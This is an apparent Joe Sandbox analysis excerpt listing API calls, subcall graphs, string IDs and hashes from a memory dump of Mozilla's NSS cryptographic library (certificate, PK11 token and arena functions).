                                                                                                                                                                                                                                                                                                                      • PR_CallOnceWithArg.NSS3(6CFC2178,6CE8BCF0,?), ref: 6CE8B915
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5B100: TlsGetValue.KERNEL32 ref: 6CE5B127
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5B100: EnterCriticalSection.KERNEL32 ref: 6CE5B140
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5B100: PR_Unlock.NSS3 ref: 6CE5B159
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5B100: TlsGetValue.KERNEL32 ref: 6CE5B195
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5B100: EnterCriticalSection.KERNEL32 ref: 6CE5B1AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5B100: PR_NotifyAllCondVar.NSS3 ref: 6CE5B1CA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5B100: PR_Unlock.NSS3 ref: 6CE5B1D7
                                                                                                                                                                                                                                                                                                                      • PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CE8B933
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: PORT_Alloc_Util.NSS3(0000000C), ref: 6CEB313B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: PR_NewLock.NSS3 ref: 6CEB3157
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: free.MOZGLUE(00000000), ref: 6CEB3166
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: PORT_Alloc_Util.NSS3(0000000C), ref: 6CEB3173
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: PR_NewLock.NSS3 ref: 6CEB3188
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: free.MOZGLUE(00000000), ref: 6CEB3197
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: PORT_Alloc_Util.NSS3(0000000C), ref: 6CEB31A4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: PR_NewLock.NSS3 ref: 6CEB31C0
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE8BC5A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE89580: PK11_IsFriendly.NSS3(00000000,?,6CE8A64D,00000000,00000001,?), ref: 6CE8958F
                                                                                                                                                                                                                                                                                                                      • PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CE8B9C8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: PK11_IsLoggedIn.NSS3(00000000,?), ref: 6CEB3286
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: free.MOZGLUE(?), ref: 6CEB33EE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3120: free.MOZGLUE(00000000), ref: 6CEB3429
                                                                                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CE8B9E1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6CE5F379,?,00000000,-00000002), ref: 6CEBF9B7
                                                                                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6CE8BA48
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6CE8BA6B
                                                                                                                                                                                                                                                                                                                      • CERT_IsUserCert.NSS3(?), ref: 6CE8BA80
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE8BAD5
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE8BB01
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE8BB10
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63B50: TlsGetValue.KERNEL32 ref: 6CE63B69
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63B50: EnterCriticalSection.KERNEL32(?), ref: 6CE63B79
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63B50: PL_HashTableLookup.NSS3(?), ref: 6CE63B89
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63B50: PR_Unlock.NSS3 ref: 6CE63B99
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE8BBCD
                                                                                                                                                                                                                                                                                                                      • CERT_GetCertTrust.NSS3(00000000,?), ref: 6CE8BBE3
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CE8BBF7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63BF0: TlsGetValue.KERNEL32 ref: 6CE63C0E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63BF0: EnterCriticalSection.KERNEL32 ref: 6CE63C23
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63BF0: PL_HashTableLookup.NSS3 ref: 6CE63C3B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63BF0: SECITEM_DupItem_Util.NSS3 ref: 6CE63C47
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63BF0: PR_Unlock.NSS3 ref: 6CE63C5E
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE8BC22
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE8BC35
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE8BC7E
                                                                                                                                                                                                                                                                                                                      • PK11_FindKeyByAnyCert.NSS3(00000000,?), ref: 6CE8BC91
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CE8BCAA
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$free$CertItem_K11_$CriticalEnterSectionUnlockValue$Alloc_DestroyLockZfree$CertificateHashListLookupTableTokens$AllocArenaCallCondErrorFindFriendlyLoggedMark_NotifyOnceTrustUserWith
                                                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                                                      • API String ID: 645016511-2766056989
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f4b161a550a15a2d691f4c925f72909a5832229ea66386cfa698b2f98241399d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8d63aac382f49326904e0d27327503b2bb1a6507dfa0bb8e7a8171dd811f6e41
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4b161a550a15a2d691f4c925f72909a5832229ea66386cfa698b2f98241399d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26B1B1B5E052019BD700CF25DC80A6B77F4AF4571CF28452CEC89ABB51EB35E909C7A2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE6DDDE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CE6DDF5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE6DE34
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6CE6DE93
                                                                                                                                                                                                                                                                                                                      • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CE6DE9D
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE6DEB4
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE6DEC3
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CE6DED8
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s%s,?,?), ref: 6CE6DEF0
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6CF9AAF9,(NULL) (Validity Unknown)), ref: 6CE6DF04
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE6DF13
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE6DF22
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE6DF33
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE6DF3C
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE6DF4B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE6DF74
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE6DF8E
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                                                                                                                      • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                                                                                                                      • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f8d524e020e57f0aeb0f30df1b4d854eec30bb87f934096b18624a9bb8171942
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 11e45b85560b7bcefd1579969e7da94cf5959d6527be491eb2d49948534b6b86
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8d524e020e57f0aeb0f30df1b4d854eec30bb87f934096b18624a9bb8171942
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE51E5B5E501015BDB10DF669C41AAF7AF9AF85358F744029E819E7B00E731DA05CBE2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6CE9094D
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE90953
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6CE9096E
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6CE90974
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CE9098F
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CE90995
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CE91860
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6CE909BF), ref: 6CE91897
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CE918AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91800: memcpy.VCRUNTIME140(?,?,?), ref: 6CE918C4
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CE90B4F
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CE90B5E
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CE90B6B
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6CE90B78
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                                                                                                                                                                                                                                      • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                                                                                                                                                                                                                                      • API String ID: 1637529542-763765719
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 44d88b9c82a287bf15c1377af0762968028943dd82ca2d24b4af9754f1e46a79
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 716662fc09398747e23c556fc5ff5895b52a4334c82070aac0e6e0826ebd923a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44d88b9c82a287bf15c1377af0762968028943dd82ca2d24b4af9754f1e46a79
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51818A76604301AFD710CF54C880A9AF7F8EF8D218F14891DF99997752E731E919CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CEA2DEC
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CEA2E00
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEA2E2B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEA2E43
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CE74F1C,?,-00000001,00000000,?), ref: 6CEA2E74
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CE74F1C,?,-00000001,00000000), ref: 6CEA2E88
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CEA2EC6
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CEA2EE4
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CEA2EF8
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA2F62
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEA2F86
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6CEA2F9E
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA2FCA
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEA301A
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEA302E
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA3066
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEA3085
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA30EC
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEA310C
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6CEA3124
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA314C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE89180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CEB379E,?,6CE89568,00000000,?,6CEB379E,?,00000001,?), ref: 6CE8918D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE89180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CEB379E,?,6CE89568,00000000,?,6CEB379E,?,00000001,?), ref: 6CE891A0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507AD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CDE204A), ref: 6CE507E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,6CDE204A), ref: 6CE50864
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE50880
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,6CDE204A), ref: 6CE508CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508D7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508FB
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEA316D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 988f063e02d3273ff736587e506679fe190963f87e4c5fec8a39dcdb23b07361
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9b128a50c43c7625741a4fd2303d3bbf5d749e53c442d307fd9e6acd01161da3
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 988f063e02d3273ff736587e506679fe190963f87e4c5fec8a39dcdb23b07361
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23F1AEB1E002099FDF01DFA5D884B9EBBB4BF19318F244169EC04AB711E731E996CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: TlsGetValue.KERNEL32 ref: 6CE806C2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: EnterCriticalSection.KERNEL32(?), ref: 6CE806D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: PR_Unlock.NSS3 ref: 6CE806EB
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE69BA9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE81750: PR_EnterMonitor.NSS3(?,?,00000000,00000000,?,6CE6991E,00000000,00000000,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE81769
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE81750: PR_ExitMonitor.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE8180C
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE69930
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE6995D
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE6997E
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE699AD
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE699C4
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE699E2
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE62D6B), ref: 6CE69A1F
                                                                                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,?,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE69A27
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE69AE1
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6CE69AF5
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE69B11
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE69B3B
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6CE69B4F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE69B72
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CE69BC7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CE788AE,-00000008), ref: 6CE78A04
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: EnterCriticalSection.KERNEL32(?), ref: 6CE78A15
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: memset.VCRUNTIME140(6CE788AE,00000000,00000132), ref: 6CE78A27
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: PR_Unlock.NSS3(?), ref: 6CE78A35
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
